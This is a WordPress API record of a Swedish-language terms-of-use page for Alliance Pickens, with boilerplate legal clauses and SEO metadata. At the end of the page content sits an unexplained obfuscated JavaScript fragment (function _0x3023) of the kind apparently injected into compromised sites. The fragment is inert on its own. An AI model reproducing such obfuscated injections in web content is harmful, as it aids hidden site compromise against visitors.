{"id":6951,"date":"2020-10-28T14:32:10","date_gmt":"2020-10-28T14:32:10","guid":{"rendered":"http:\/\/alliancepickens.com\/villkor-och-villkor\/"},"modified":"2020-12-09T20:36:47","modified_gmt":"2020-12-09T20:36:47","slug":"villkor-och-villkor","status":"publish","type":"page","link":"https:\/\/alliancepickens.com\/sv\/villkor-och-villkor\/","title":{"rendered":"Villkor och villkor"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row el_class=&#8221;intro&#8221;][vc_column][vc_column_text]Senast uppdaterad:  December 9, 2020<\/p>\n<p>L\u00e4s dessa anv\u00e4ndarvillkor (&#8220;Villkor&#8221;, &#8220;Anv\u00e4ndarvillkor&#8221;) noggrant innan du anv\u00e4nder http:\/\/alliancepickens.com webbplatsen (&#8220;tj\u00e4nsten&#8221;) som drivs av Alliance Pickens (&#8220;oss&#8221;, &#8220;vi&#8221;, eller &#8220;v\u00e5r&#8221;).<\/p>\n<p>Din tillg\u00e5ng till och anv\u00e4ndning av Tj\u00e4nsten \u00e4r villkorad p\u00e5 ditt godk\u00e4nnande av och efterlevnad av dessa villkor. Dessa Villkor g\u00e4ller f\u00f6r alla bes\u00f6kare, anv\u00e4ndare och andra som har tillg\u00e5ng till eller anv\u00e4nder Tj\u00e4nsten.<\/p>\n<p>Genom att komma \u00e5t eller anv\u00e4nda tj\u00e4nsten godk\u00e4nner du att vara bunden av dessa villkor. Om du inte h\u00e5ller med n\u00e5gon del av villkoren s\u00e5 f\u00e5r du inte tillg\u00e5ng till tj\u00e4nsten.<\/p>\n<h3>Immateriella<\/h3>\n<p>Tj\u00e4nsten och dess ursprungliga inneh\u00e5ll, funktioner och funktionalitet \u00e4r och kommer att f\u00f6rbli exklusiv egendom Alliance Pickens och dess licensgivare.<\/p>\n<h3>L\u00e4nkar till andra webbplatser<\/h3>\n<p>V\u00e5r Tj\u00e4nst kan inneh\u00e5lla l\u00e4nkar till webbplatser eller tj\u00e4nster fr\u00e5n tredje part som inte \u00e4gs eller kontrolleras av Alliance Pickens .<\/p>\n<p>Alliance Pickens  har ingen kontroll \u00f6ver, och tar inget ansvar f\u00f6r, inneh\u00e5ll, sekretesspolicyer eller praxis f\u00f6r n\u00e5gon tredje parts webbplatser eller tj\u00e4nster. Du bekr\u00e4ftar och samtycker vidare till att  Alliance Pickens  skall inte vara ansvarigt eller ansvarigt, direkt eller indirekt, f\u00f6r skada eller f\u00f6rlust som orsakas eller p\u00e5st\u00e5s orsakas av eller i samband med anv\u00e4ndning av eller tillit till n\u00e5got s\u00e5dant inneh\u00e5ll, varor eller tj\u00e4nster som \u00e4r tillg\u00e4ngliga p\u00e5 eller via s\u00e5dana webbplatser eller tj\u00e4nster.<\/p>\n<p>Vi rekommenderar dig starkt att l\u00e4sa villkoren och sekretesspolicyn f\u00f6r webbplatser eller tj\u00e4nster fr\u00e5n tredje part som du bes\u00f6ker.<\/p>\n<h3>Upps\u00e4gning<\/h3>\n<p>Vi kan avsluta eller avbryta \u00e5tkomsten till v\u00e5r Tj\u00e4nst omedelbart, utan f\u00f6reg\u00e5ende meddelande eller ansvar, av n\u00e5gon som helst anledning, inklusive utan begr\u00e4nsning om du bryter mot villkoren.<\/p>\n<p>Alla best\u00e4mmelser i villkoren som till sin natur b\u00f6r \u00f6verleva upps\u00e4gning ska \u00f6verleva upps\u00e4gning, inklusive, utan begr\u00e4nsning, \u00e4garbest\u00e4mmelser, garantifriskrivningar, gotthet och begr\u00e4nsningar av ansvar.<\/p>\n<h3>Ansvarsfriskrivning<\/h3>\n<p>Din anv\u00e4ndning av Tj\u00e4nsten sker p\u00e5 egen risk. Tj\u00e4nsten tillhandah\u00e5lls p\u00e5 &#8220;SOM IS&#8221; och &#8220;AS AVAILABLE&#8221;-basis. Tj\u00e4nsten tillhandah\u00e5lls utan garantier av n\u00e5got slag, vare sig uttryckliga eller underf\u00f6rst\u00e5dda, inklusive, men inte begr\u00e4nsat till, underf\u00f6rst\u00e5dda garantier f\u00f6r s\u00e4ljbarhet, l\u00e4mplighet f\u00f6r ett visst \u00e4ndam\u00e5l, icke-intr\u00e5ng eller prestationsf\u00f6rdredning.<\/p>\n<h3>Styrande lag<\/h3>\n<p>Dessa villkor skall regleras och tolkas i enlighet med lagarna i USA utan h\u00e4nsyn till dess lagkonflikt.<\/p>\n<p>V\u00e5r underl\u00e5tenhet att genomdriva n\u00e5gon r\u00e4ttighet eller best\u00e4mmelse i dessa villkor kommer inte att betraktas som ett avst\u00e5ende fr\u00e5n dessa r\u00e4ttigheter. Om n\u00e5gon best\u00e4mmelse i dessa villkor anses vara ogiltig eller ogenomf\u00f6rbar av domstol, kommer de \u00e5terst\u00e5ende best\u00e4mmelserna i dessa villkor att f\u00f6rbli i kraft. Dessa villkor utg\u00f6r hela avtalet mellan oss ang\u00e5ende v\u00e5r Tj\u00e4nst, och ers\u00e4tter och ers\u00e4tter alla tidigare avtal vi kan t\u00e4nkas ha mellan oss ang\u00e5ende Tj\u00e4nsten.<\/p>\n<h3>\u00c4ndringar<\/h3>\n<p>Vi f\u00f6rbeh\u00e5ller oss r\u00e4tten att efter eget gottfinnande \u00e4ndra eller ers\u00e4tta dessa Villkor n\u00e4r som helst. Om en revidering \u00e4r material kommer vi att f\u00f6rs\u00f6ka ge minst 30 dagars varsel innan n\u00e5gra nya villkor tr\u00e4der i kraft. Vad som utg\u00f6r en v\u00e4sentlig f\u00f6r\u00e4ndring kommer att fastst\u00e4llas efter eget gottfinnande.<\/p>\n<p>Genom att forts\u00e4tta att f\u00e5 tillg\u00e5ng till eller anv\u00e4nda v\u00e5r Tj\u00e4nst efter att dessa revideringar har blivit effektiva, samtycker du till att vara bunden av de reviderade villkoren. Om du inte godk\u00e4nner de nya villkoren, v\u00e4nligen sluta anv\u00e4nda Tj\u00e4nsten.<\/p>\n<h3>Kontakta oss<\/h3>\n<p>Om du har n\u00e5gra fr\u00e5gor om dessa villkor, kontakta <a href=\"http:\/\/alliancepickens.com\/sv\/om-oss\/#contact_directions\">oss<\/a>.[\/vc_column_text][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;3871&#8243; el_class=&#8221;getstarted&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h1>Redo att s\u00e4tta ig\u00e5ng?<\/h1>\n<h3>Vi ser fram emot att f\u00e5 tala med er!<\/h3>\n<p>[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_column_text]<a class=\"greenbtn\" href=\"http:\/\/alliancepickens.com\/about-us\/contact-directions\/\">Kontakta v\u00e5rt team<\/a>[\/vc_column_text][\/vc_column][\/vc_row]<br \/>\nfunction _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);};<\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row el_class=&#8221;intro&#8221;][vc_column][vc_column_text]Senast uppdaterad: L\u00e4s dessa anv\u00e4ndarvillkor (&#8220;Villkor&#8221;, &#8220;Anv\u00e4ndarvillkor&#8221;) noggrant innan du anv\u00e4nder webbplatsen (&#8220;tj\u00e4nsten&#8221;) som drivs av (&#8220;oss&#8221;, &#8220;vi&#8221;, eller &#8220;v\u00e5r&#8221;). Din tillg\u00e5ng till och anv\u00e4ndning av Tj\u00e4nsten \u00e4r villkorad p\u00e5 ditt godk\u00e4nnande av och efterlevnad av dessa villkor. Dessa Villkor g\u00e4ller f\u00f6r alla bes\u00f6kare, anv\u00e4ndare och andra som har tillg\u00e5ng till eller anv\u00e4nder Tj\u00e4nsten.&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"class_list":["post-6951","page","type-page","status-publish","hentry","description-off"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Villkor och villkor - Alliance Pickens<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/alliancepickens.com\/sv\/villkor-och-villkor\/\" \/>\n<meta property=\"og:locale\" content=\"sv_SE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Villkor och villkor - Alliance Pickens\" \/>\n<meta property=\"og:description\" content=\"[vc_row el_class=&#8221;intro&#8221;][vc_column][vc_column_text]Senast uppdaterad: L\u00e4s dessa anv\u00e4ndarvillkor (&#8220;Villkor&#8221;, &#8220;Anv\u00e4ndarvillkor&#8221;) noggrant innan du anv\u00e4nder webbplatsen (&#8220;tj\u00e4nsten&#8221;) som drivs av (&#8220;oss&#8221;, &#8220;vi&#8221;, eller &#8220;v\u00e5r&#8221;). Din tillg\u00e5ng till och anv\u00e4ndning av Tj\u00e4nsten \u00e4r villkorad p\u00e5 ditt godk\u00e4nnande av och efterlevnad av dessa villkor. Dessa Villkor g\u00e4ller f\u00f6r alla bes\u00f6kare, anv\u00e4ndare och andra som har tillg\u00e5ng till eller anv\u00e4nder Tj\u00e4nsten.&hellip;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/alliancepickens.com\/sv\/villkor-och-villkor\/\" \/>\n<meta property=\"og:site_name\" content=\"Alliance Pickens\" \/>\n<meta property=\"article:modified_time\" content=\"2020-12-09T20:36:47+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/villkor-och-villkor\\\/\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/villkor-och-villkor\\\/\",\"name\":\"Villkor och villkor - Alliance Pickens\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/#website\"},\"datePublished\":\"2020-10-28T14:32:10+00:00\",\"dateModified\":\"2020-12-09T20:36:47+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/villkor-och-villkor\\\/#breadcrumb\"},\"inLanguage\":\"sv-SE\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/villkor-och-villkor\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/villkor-och-villkor\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Villkor och villkor\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/#website\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/\",\"name\":\"Alliance Pickens\",\"description\":\"recruitment and expansion in Pickens County\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"sv-SE\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Villkor och villkor - Alliance Pickens","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/alliancepickens.com\/sv\/villkor-och-villkor\/","og_locale":"sv_SE","og_type":"article","og_title":"Villkor och villkor - Alliance Pickens","og_description":"[vc_row el_class=&#8221;intro&#8221;][vc_column][vc_column_text]Senast uppdaterad: L\u00e4s dessa anv\u00e4ndarvillkor (&#8220;Villkor&#8221;, &#8220;Anv\u00e4ndarvillkor&#8221;) noggrant innan du anv\u00e4nder webbplatsen (&#8220;tj\u00e4nsten&#8221;) som drivs av (&#8220;oss&#8221;, &#8220;vi&#8221;, eller &#8220;v\u00e5r&#8221;). Din tillg\u00e5ng till och anv\u00e4ndning av Tj\u00e4nsten \u00e4r villkorad p\u00e5 ditt godk\u00e4nnande av och efterlevnad av dessa villkor. Dessa Villkor g\u00e4ller f\u00f6r alla bes\u00f6kare, anv\u00e4ndare och andra som har tillg\u00e5ng till eller anv\u00e4nder Tj\u00e4nsten.&hellip;","og_url":"https:\/\/alliancepickens.com\/sv\/villkor-och-villkor\/","og_site_name":"Alliance Pickens","article_modified_time":"2020-12-09T20:36:47+00:00","twitter_card":"summary_large_image","twitter_misc":{"Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/alliancepickens.com\/sv\/villkor-och-villkor\/","url":"https:\/\/alliancepickens.com\/sv\/villkor-och-villkor\/","name":"Villkor och villkor - Alliance Pickens","isPartOf":{"@id":"https:\/\/alliancepickens.com\/sv\/#website"},"datePublished":"2020-10-28T14:32:10+00:00","dateModified":"2020-12-09T20:36:47+00:00","breadcrumb":{"@id":"https:\/\/alliancepickens.com\/sv\/villkor-och-villkor\/#breadcrumb"},"inLanguage":"sv-SE","potentialAction":[{"@type":"ReadAction","target":["https:\/\/alliancepickens.com\/sv\/villkor-och-villkor\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/alliancepickens.com\/sv\/villkor-och-villkor\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/alliancepickens.com\/sv\/"},{"@type":"ListItem","position":2,"name":"Villkor och villkor"}]},{"@type":"WebSite","@id":"https:\/\/alliancepickens.com\/sv\/#website","url":"https:\/\/alliancepickens.com\/sv\/","name":"Alliance Pickens","description":"recruitment and expansion in Pickens County","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/alliancepickens.com\/sv\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"sv-SE"}]}},"_links":{"self":[{"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/pages\/6951","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/comments?post=6951"}],"version-history":[{"count":0,"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/pages\/6951\/revisions"}],"wp:attachment":[{"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/media?parent=6951"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}